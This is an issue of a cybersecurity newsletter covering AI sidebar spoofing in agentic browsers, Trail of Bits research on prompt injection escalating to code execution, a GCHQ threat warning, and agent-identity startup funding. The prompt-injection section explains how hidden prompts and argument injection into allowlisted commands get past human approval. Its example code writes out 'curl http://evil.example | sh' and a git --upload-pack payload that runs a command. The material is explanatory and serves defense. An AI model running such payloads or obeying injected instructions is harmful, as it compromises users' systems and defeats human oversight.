Cyber AI Chronicle
By Simon Ganiere · 24th October 2025
Welcome Back
Agentic browsers like OpenAI's Atlas and Perplexity's Comet are facing a sophisticated new threat that exploits the one thing users trust most—the AI interface itself.
Through malicious browser extensions that create pixel-perfect replicas of legitimate AI sidebars, attackers can now manipulate responses, serve phishing links, and even trick users into executing system-compromising commands. Could this shift from code exploitation to interface manipulation represent the next major battleground in AI security?
In today's AI recap:
AI Browsers Under Siege
What you need to know: Security researchers have demonstrated a new attack, AI Sidebar Spoofing, that allows attackers to hijack agentic browsers like OpenAI's Atlas and Perplexity's Comet through malicious extensions.
Why is it relevant?:
The attack uses a malicious browser extension to inject a pixel-perfect replica of the trusted AI sidebar, making it nearly impossible for users to spot the fake interface.
Once a user interacts with the fake sidebar, the attacker can manipulate the AI's responses to serve phishing links, trick users into granting malicious OAuth permissions, or even guide them into executing commands that install a reverse shell.
While vendors promote their products' built-in safeguards, this attack bypasses them by relying on social engineering to get the user to install the extension, highlighting a critical new threat vector for all AI-integrated browsers.
Bottom line: This new threat shifts the attack surface from exploiting code to manipulating the trusted AI interface itself. Security teams must now account for attacks that weaponize the user's trust in AI agents through sophisticated social engineering.
From Prompt to Pwned
What you need to know: Security researchers at Trail of Bits demonstrated how prompt injection attacks against AI agents can escalate to achieve remote code execution (RCE), turning a simple chat manipulation into a full system compromise.
Why is it relevant?:
The exploit works through argument injection attacks, where malicious parameters are passed to pre-approved "safe" system commands like git or grep, tricking the agent into executing harmful operations.
This technique cleverly bypasses the human-in-the-loop approval step that many agents rely on for running sensitive commands, making it a particularly stealthy attack vector.
The attack surface is broader than just direct user input, as malicious prompts can be hidden in code comments, log files, or public repositories that an agent might process as untrusted content.
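To make the bypass concrete, here is a minimal sketch of how an allowlist-based approval policy can be defeated by argument injection. The `SAFE_COMMANDS` set and the `is_auto_approved` helper are hypothetical, not code from the Trail of Bits research; the `--upload-pack` flag, however, is a real git option that names a program for git to execute.

```python
import shlex

# Hypothetical allowlist of "safe" binaries an agent may run
# without asking the human operator for approval.
SAFE_COMMANDS = {"git", "grep", "find"}

def is_auto_approved(command_line: str) -> bool:
    """Naive policy: approve any command whose binary is allowlisted."""
    argv = shlex.split(command_line)
    return bool(argv) and argv[0] in SAFE_COMMANDS

# An obviously dangerous command is stopped by the allowlist...
assert not is_auto_approved("curl http://evil.example | sh")

# ...but argument injection sails through: git's --upload-pack flag
# tells git which program to run, so the "safe" binary becomes an
# arbitrary-code launcher while the policy check still passes.
payload = "git ls-remote --upload-pack='touch /tmp/pwned' file:///tmp/repo"
assert is_auto_approved(payload)  # approved, yet attacker code would run
```

The lesson matches the researchers' point: filtering on the command name is not enough, because flags and arguments carry executable semantics of their own.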
Bottom line: This research highlights that securing AI agents requires more than just prompt filtering. Developers must shift focus to fundamental security controls like sandboxing and isolating agent operations from the host system.
Go from AI overwhelmed to AI savvy professional
AI will eliminate 300 million jobs in the next 5 years.
Yours doesn't have to be one of them.
Here's how to future-proof your career:
Join the Superhuman AI newsletter - read by 1M+ professionals
Learn AI skills in 3 mins a day
Become the AI expert on your team
GCHQ Warns of AI-Fueled Cyber Threats
What you need to know: The director of the UK's GCHQ intelligence agency warns that Britain faces its most complex threat landscape in three decades. Director Anne Keast-Butler revealed that significant cyberattacks have quadrupled over the past year, a surge fueled by nation-state actors and the rapid weaponization of artificial intelligence.
Why is it relevant?:
The sheer volume of threats is climbing, with GCHQ's National Cyber Security Centre now handling four significant incidents a week, a fourfold increase compared to the previous year.
GCHQ is also using AI defensively, focusing on boosting analyst productivity, embedding secure-by-design principles in new AI systems, and understanding how adversaries are exploiting the technology.
The agency is pushing for board-level accountability, citing massive real-world consequences like the recent Jaguar Land Rover attack, which cost the UK economy an estimated $2.5 billion.
Bottom line: The message from GCHQ is clear: AI is accelerating the cat-and-mouse game of cybersecurity for both attackers and defenders. Proactive leadership and robust contingency planning are no longer optional for navigating this new era of digital threats.
The Billion-Dollar AI Identity Crisis
What you need to know: Startup Keycard has emerged from stealth with $38 million in funding to build an identity and access management (IAM) platform for autonomous AI agents.
Why is it relevant?:
As companies rapidly adopt AI, they create a new security blind spot with autonomous agents that often operate with inherited credentials, no clear owner, and excessive permissions.
Keycard tackles this by using cryptography to prove each agent’s identity and ownership, replacing static API keys with dynamic, task-scoped tokens that enforce access controls at runtime.
The funding, with rounds led by Andreessen Horowitz and Acrew Capital, signals strong investor confidence that securing AI agent identity is a critical and urgent challenge for the enterprise.
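To illustrate the difference between a static API key and a dynamic, task-scoped token, here is a minimal sketch of minting and enforcing such a token. This is not Keycard's API; the function names, claims layout, and shared-secret HMAC signing are all illustrative assumptions (a production system would use per-agent keypairs, not a shared secret).

```python
import base64
import hashlib
import hmac
import json
import time

SECRET = b"demo-signing-key"  # illustration only; real systems use per-agent keypairs

def mint_task_token(agent_id: str, scope: list[str], ttl_s: int = 300) -> str:
    """Mint a short-lived token bound to one agent and one task scope."""
    claims = {"agent": agent_id, "scope": scope, "exp": time.time() + ttl_s}
    body = base64.urlsafe_b64encode(json.dumps(claims).encode()).decode()
    sig = hmac.new(SECRET, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{sig}"

def authorize(token: str, action: str) -> bool:
    """Enforce signature, expiry, and scope at runtime, per request."""
    body, _, sig = token.rpartition(".")
    expected = hmac.new(SECRET, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        return False  # tampered or forged token
    claims = json.loads(base64.urlsafe_b64decode(body))
    return time.time() < claims["exp"] and action in claims["scope"]

token = mint_task_token("billing-agent", scope=["invoices:read"])
assert authorize(token, "invoices:read")        # allowed within task scope
assert not authorize(token, "invoices:delete")  # denied: out of scope
```

Unlike a static key, a leaked token here expires in minutes and only ever authorized one narrow task, which is the property that makes agent credentials auditable and containable.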
Bottom line: Managing non-human identity is shifting from a background task to a core security function for any organization deploying AI agents. These new guardrails are essential for building the trust needed to unlock the potential of a true agent-driven economy.
The Shortlist
Verizon reported that 85% of organizations are seeing a surge in mobile attacks, with over three-quarters believing that AI-assisted threats like smishing and deepfakes are likely to succeed.
Pentera introduced Resolve, a new AI-powered product that automates remediation workflows by turning validated security findings into structured tasks and routing them to the responsible teams.
Meta launched new on-device AI tools for WhatsApp and Messenger that warn users about screen sharing with unknown contacts and alert them to potentially suspicious messages to combat scams.
AI Influence Level
Level 4 - AI Created, Human Basic Idea / The whole newsletter is generated via an n8n workflow based on publicly available RSS feeds. Human-in-the-loop review of the selected articles and subjects.
Reference: AI Influence Level from Daniel Miessler
Till next time!
Project Overwatch is a cutting-edge newsletter at the intersection of cybersecurity, AI, technology, and resilience, designed to navigate the complexities of our rapidly evolving digital landscape. It delivers insightful analysis and actionable intelligence, empowering you to stay ahead in a world where staying informed is not just an option, but a necessity.
